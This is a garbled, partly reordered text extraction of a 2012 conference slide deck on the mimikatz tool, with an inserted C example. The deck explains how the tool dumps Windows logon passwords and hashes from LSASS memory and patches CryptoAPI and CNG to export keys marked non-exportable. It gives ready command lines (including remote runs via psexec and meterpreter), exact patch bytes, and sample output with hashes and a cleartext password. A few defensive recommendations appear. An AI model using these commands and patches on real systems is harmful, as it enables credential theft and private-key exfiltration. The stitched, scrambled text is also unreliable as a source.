ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz # crypto::patchcapi: demo time

Import, export, import again as not exportable (certutil -importpfx … NoExport)… export!
mimikatz # crypto::patchcapi: limitations

Because:
 - I'm lazy
 - in the majority of real-life cases I have seen RSA keys; Elliptic Curve, a little…

crypto::patchcapi only deals with:
 - Microsoft Base Cryptographic Provider v1.0
 - Microsoft Enhanced Cryptographic Provider v1.0
 - Microsoft Enhanced RSA and AES Cryptographic Provider
 - Microsoft RSA SChannel Cryptographic Provider
 - Microsoft Strong Cryptographic Provider
… all based on rsaenh.dll.

The "Provider" line that crypto::exportCertificates and certutil print for each key says which path applies: one of the CSP names above means rsaenh.dll and crypto::patchcapi, "Microsoft Software Key Storage Provider" means CNG and crypto::patchcng; a smart-card or hardware CSP/KSP is reached by neither patch, because the key is not in rsaenh.dll or in the software KSP.
mimikatz # crypto::cng: how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
 - http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time key operations are not made in the "user" process context: the process uses RPC to call the "Key Isolation service" (KeyIso) functions, and KeyIso runs inside the LSASS process.

It seems more secure than CryptoAPI…
 - It is, but it's not perfect…
mimikatz # crypto::cng: how it's exported (PLAYSKOOL level)

[diagram, reconstructed from the slide's labels]
  Process --CNG--> "Ask to export key"
     |
     | RPC
     v
  KeyIso service (LSASS process; on NT6 a System protected process at ML_SYSTEM,
  SYSTEM_MANDATORY_LABEL_NO_WRITE_UP | SYSTEM_MANDATORY_LABEL_NO_READ_UP)
     DPAPI decode -> Load private key -> Exportable?
        yes -> Exported key, returned to the process over RPC
        no  -> NTE_NOT_SUPPORTED
mimikatz # crypto::patchcng: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), the RPC calls end up in lsass (KeyIso), in ncrypt!SPCryptExportKey. This function does all the work to prepare the export and checks whether the key is exportable. Note that the refusal differs from the CAPI case: CNG answers NTE_NOT_SUPPORTED (0x80090029), not NTE_BAD_KEY_STATE (0x8009000b).

mimikatz # crypto::exportKeys
[user] CNG keys:
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportable : NO
        Key size   : 2048
        Private export to 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
                mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK ; (0x80090029) The requested operation is not supported.
mimikatz # crypto::patchcng: because sometimes I own LSASS

This time the checks and the keys are in the LSASS process… And what?

I wrote "1" byte in LSASS memory space… Here the branch is a short jnz (rel8), so only the opcode byte is rewritten, 75 to EB, and the displacement stays as it is. The write needs a handle to lsass.exe, hence the privileges listed under limitations.

.text:6C815210  75 1C   jnz  short continue_key_export
.text:6C815210  EB 1C   jmp  short continue_key_export
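The CAPI rewrite (four bytes in rsaenh.dll, two sites) and the CNG rewrite (one byte in ncrypt.dll) follow the same x86 encoding rule, and the C program below, an added example that is not mimikatz code, replays both on byte buffers so the byte counts and the unchanged branch targets can be checked offline. The instruction bytes and addresses are copied from the two slides and are valid only for those rsaenh.dll and ncrypt.dll builds; the filler bytes around each site, the signature-search helper and the "patch, then re-decode the target" self-check are the example's own. Nothing here touches a live process: mimikatz does the CAPI write inside its own address space and the CNG write inside LSASS, as the slides describe.

```c
/* Added example, not mimikatz code: the branch rewrites of slides 43 (rsaenh.dll,
 * own process) and 49 (ncrypt.dll, LSASS) replayed on byte buffers.  Encodings
 * and addresses are the slides'; the filler bytes around each site are constructed. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Target of the branch at code[0] (virtual address va): short Jcc 7x rel8,
 * short JMP EB rel8, near Jcc 0F 8x rel32, near JMP E9 rel32; a leading NOP is
 * skipped so the patched "nop; jmp" decodes too.  0 for anything else. */
uint32_t branch_target(const uint8_t *code, uint32_t va)
{
    int32_t rel;
    if (code[0] == 0x90) return branch_target(code + 1, va + 1);
    if ((code[0] & 0xF0) == 0x70 || code[0] == 0xEB) return va + 2 + (int8_t)code[1];
    if (code[0] == 0xE9) { memcpy(&rel, code + 1, 4); return va + 5 + rel; }
    if (code[0] == 0x0F && (code[1] & 0xF0) == 0x80) { memcpy(&rel, code + 2, 4); return va + 6 + rel; }
    return 0;
}

/* Make the conditional branch at code[0] unconditional; returns bytes written.
 * Near 0F 8x rel32 (6 bytes) -> 90 E9 rel32: the nop pushes the jmp one byte
 * forward and E9 rel32 is one byte shorter than 0F 8x rel32, so the old rel32
 * still reaches the old target and only 2 bytes change.
 * Short 7x rel8 (2 bytes) -> EB rel8: the opcode only, 1 byte. */
size_t patch_jcc_to_jmp(uint8_t *code)
{
    if (code[0] == 0x0F && (code[1] & 0xF0) == 0x80) { code[0] = 0x90; code[1] = 0xE9; return 2; }
    if ((code[0] & 0xF0) == 0x70) { code[0] = 0xEB; return 1; }
    return 0;
}

/* Offset of sig in buf, or (size_t)-1.  A patcher finds the site this way in the
 * loaded module; the slides' absolute addresses fit one build at one load address. */
size_t find_signature(const uint8_t *buf, size_t len, const uint8_t *sig, size_t siglen)
{
    for (size_t i = 0; i + siglen <= len; i++)
        if (memcmp(buf + i, sig, siglen) == 0) return i;
    return (size_t)-1;
}

/* Constructed 20-byte slice of .text: invented filler, the branch at offset 8, filler. */
static void build_site(uint8_t *out, const uint8_t *enc, size_t enclen)
{
    static const uint8_t before[8] = {0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10, 0x53, 0x56};
    static const uint8_t after[6]  = {0x57, 0x8B, 0x7D, 0x08, 0x33, 0xF6};
    memset(out, 0xCC, 20);
    memcpy(out, before, 8);
    memcpy(out + 8, enc, enclen);
    memcpy(out + 8 + enclen, after, 6);
}

/* Locate by signature, patch, return bytes changed; 0 if the site is missing
 * or the rewrite moved the target (a broken patch). */
static size_t patch_site(uint8_t *buf, size_t len, uint32_t base_va,
                         const uint8_t *sig, size_t siglen, uint32_t *target)
{
    size_t off = find_signature(buf, len, sig, siglen);
    if (off == (size_t)-1) return 0;
    uint32_t before = branch_target(buf + off, base_va + (uint32_t)off);
    size_t changed = patch_jcc_to_jmp(buf + off);
    uint32_t after = branch_target(buf + off, base_va + (uint32_t)off);
    if (target) *target = after;
    return (before != 0 && before == after) ? changed : 0;
}

/* Slide 43: two near jnz in rsaenh!CPExportKey -> 4 bytes (2 per site). */
size_t capi_patch_bytes(uint32_t *site1_target)
{
    static const uint8_t jnz1[6] = {0x0F, 0x85, 0x33, 0xC7, 0xFF, 0xFF}; /* .text:0AC0B7CB */
    static const uint8_t jnz2[6] = {0x0F, 0x85, 0xB6, 0x3B, 0xFF, 0xFF}; /* .text:0AC1F749 */
    uint8_t s1[20], s2[20];
    build_site(s1, jnz1, 6);
    build_site(s2, jnz2, 6);
    size_t n1 = patch_site(s1, 20, 0x0AC0B7CBu - 8, jnz1, 6, site1_target);
    size_t n2 = patch_site(s2, 20, 0x0AC1F749u - 8, jnz2, 6, NULL);
    return (n1 && n2) ? n1 + n2 : 0;
}

/* Slide 49: one short jnz in ncrypt!SPCryptExportKey inside LSASS -> 1 byte. */
size_t cng_patch_bytes(uint32_t *target)
{
    static const uint8_t jnz[2] = {0x75, 0x1C}; /* .text:6C815210 */
    uint8_t s[20];
    build_site(s, jnz, 2);
    return patch_site(s, 20, 0x6C815210u - 8, jnz, 2, target);
}

/* Where the patched branches land: unchanged, 0AC07F04 and 6C81522E. */
uint32_t capi_site1_target(void) { uint32_t t = 0; capi_patch_bytes(&t); return t; }
uint32_t cng_site_target(void)   { uint32_t t = 0; cng_patch_bytes(&t);  return t; }

int main(void)
{
    printf("capi: %zu bytes changed, site 1 still jumps to %08X\n", capi_patch_bytes(NULL), capi_site1_target());
    printf("cng : %zu byte changed, site still jumps to %08X\n", cng_patch_bytes(NULL), cng_site_target());
    return 0;
}
```

The re-decode after the write is the check worth keeping in any such patcher: a jnz rel32 replaced by jmp rel32 at the same address, without the leading nop, would land four bytes short of the intended label and corrupt the function.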
mimikatz # crypto::patchcng: demo time

Import, export, import again as not exportable… export again!
mimikatz # crypto::patchcng: limitations

The patch operation needs some privileges, since it writes into LSASS:
 - Admin (debug privilege)
 - SYSTEM

crypto::patchcng only deals with:
 - Microsoft Software Key Storage Provider (maybe other algorithms than RSA too)

Not a limitation of mimikatz, but the MMC certificates snap-in cannot export CNG certificates… even those that are exportable (hu?)
 - certutil can…
mimikatz # crypto::patchcng: bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports:
 - until reboot or a KeyIso service restart (the patch lives only in memory)

Some other programs that don't check the export flag before asking for the export work too:
 - yeah, like the good old certutil

First run, KeyIso unpatched:

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert hash (sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

Same command after crypto::patchcng:

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert hash (sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.
mimikatz # crypto: memo

Some commands:
  mimikatz "crypto::patchcapi" "crypto::exportCertificates" exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "crypto::patchcapi" "crypto::patchcng" "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
  mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
  mimikatz "privilege::debug" "crypto::patchcng" "crypto::patchcapi" "crypto::exportCertificates" "crypto::exportKeys" exit

Password:
 - PFX files written by mimikatz are protected by this password: mimikatz

Keys:
 - When you import a certificate multiple times, exportable or not, Windows makes duplicate keys.
 - When you delete a certificate, Windows does not delete its private key… funny, isn't it?
   - So yes, mimikatz can export it: crypto::exportKeys enumerates the providers' key containers rather than the certificate store, so a key orphaned by a deleted certificate still shows up.
mimikatz # crypto: what we can do

Exactly the same as for sekurlsa: what protects the keys is preventing privileged access to accounts and computers
 - no admin, no admin, no admin…

Basics:
 - Use smart cards / tokens for user certificates
 - Use Hardware Security Modules (HSM), even SoftHSM

More in depth:
 - See what Microsoft can do with the TPM from Windows 8
   - Virtual Smart Card seems promising
 - Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
   - Their biometrics stuff was a little buggy ;)
mimikatz: what else can it do?

 - Play with Minesweeper
 - Manipulate some handles
 - Pass the hash
 - Dump SAM / AD
 - Stop event monitoring
 - Patch Terminal Server
 - Basic GPO bypass
 - AppLocker / SRP bypass
 - Driver:
   - Play with tokens & privileges
   - Display SSDT x86 & x64
   - List minifilter actions
   - List notifications (process, thread, image, registry)
   - List object hooks and procedures
   - …
 - …
mimikatz: that's all folks

Thanks to / Merci à:
 - my girlfriend for her support (her LSASS crashed a few times)
 - Application Security Forum for offering me this great opportunity
   - Partners and sponsors, for sure
 - Microsoft, for always considering it as normal/acceptable
 - Security friends/community for their ideas & challenges
   - nagual, newsoft, mubix, …
 - You, for your attention

Questions?
Don't be shy ;)
 - especially if you have written down the corresponding slide number
Blog, source code & contact

blog:     http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source:   https://code.google.com/p/mimikatz
email:    benjamin@gentilkiwi.com
mimikatzworking
On XP 2003 Vista 2008 Seven 2008r2 8 Server 8
ndash x86 amp x64ndash 2000 support dropped with mimikatz 10
Everywhere itrsquos statically compiled
Two modes
ndash direct action (local commands) ndash process or driver communication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 3
sekurlsadll
mimikatzexe
KeyIsolaquo Isolation de cleacute CNG raquo
LSASSEXE
Direct action cryptopatchcng
EventLoglaquo Journal drsquoeacuteveacutenements Windows raquo
SVCHOSTEXE
Direct action diverseventdrop
mimikatzexe
SamSSlaquo Gestionnaire de comptes de seacutecuriteacute raquo
LSASSEXE
VirtualAllocEx WriteProcessMemory CreateRemoteThread
Open a pipeWrite a welcome messageWait commandshellip and return results
mimikatzarchitecture of sekurlsa amp crypto
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 4
mimikatzexe
mod_mimikatz_sekurlsa
mod_mimikatz_nogpo
mod_mimikatz_divers
mod_mimikatz_winmine
mod_mimikatz_impersonate
mod_mimikatz_inject
mod_mimikatz_samdump
mod_mimikatz_standard
mod_mimikatz_crypto
mod_mimikatz_handle
mod_mimikatz_system
mod_mimikatz_service
mod_mimikatz_process
mod_mimikatz_thread
mod_mimikatz_terminalserver
mod_mimikatz_privilege
mod_pipe
mod_inject
mod_memory
mod_parseur
mod_patch
mod_hive
mod_secacl
mod_privilege
mod_process
mod_service
mod_system
mod_thread
mod_ts
mod_text
mod_crypto
mod_cryptoapi
mod_cryptoacng
msv_1_0
tspkg
wdigest
livessp
kerberos
kappfreedll
kelloworlddll
klockdll
mimikatzsys
sekurlsadll
sam
secrets
msv_1_0
wdigest
livessp
kerberos
tspkg
mimikatz sekurlsawhat is it
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 5
mod_mimikatz_sekurlsa
mimikatz sekurlsahow LSA works ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 6
LsaSSWinLogon
AuthenticationPackagesmsv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
ChallengeResponse
userdomainpassword
PLAYSKOOL
mimikatz sekurlsahow LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7
PLAYSKOOL
mimikatz sekurlsahistory of laquo pass-the- raquo 12
Pass-the-hashndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo HernanOchoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticketndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8
mimikatz sekurlsahistory of laquo pass-the- raquo 22
Pass-the-passndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3)bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memorybull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe)bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9
mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10
mimikatz sekurlsa tspkgwhat is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquosexperiencendash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation)ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11
mimikatz sekurlsa tspkgquestions
KB says that for it works we must enable laquo Default credentials raquo delegationndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellipndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCredsbull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos)bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12
mimikatz sekurlsa tspkgsymbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenariondash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13
